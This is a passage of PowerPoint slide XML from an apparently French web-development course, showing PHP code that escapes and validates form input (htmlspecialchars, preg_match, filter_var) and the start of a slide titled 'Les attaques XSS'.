                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="50FA7B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>valid_donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_POST[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="50FA7B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>valid_donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_POST[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="50FA7B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>valid_donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_POST[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9ADCD88-941F-45D9-9433-65BB59C24D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5700543" y="4159557"/>
            <a:ext cx="5969337" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>empty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BD93F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^[A-Za-z '-]+$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>empty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($mail)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filter_var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($mail,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50FA7B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BD93F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FILTER_VALIDATE_EMAIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8591605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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="386000"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A84B7F-9996-467C-8B6E-9D1FE1E149BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
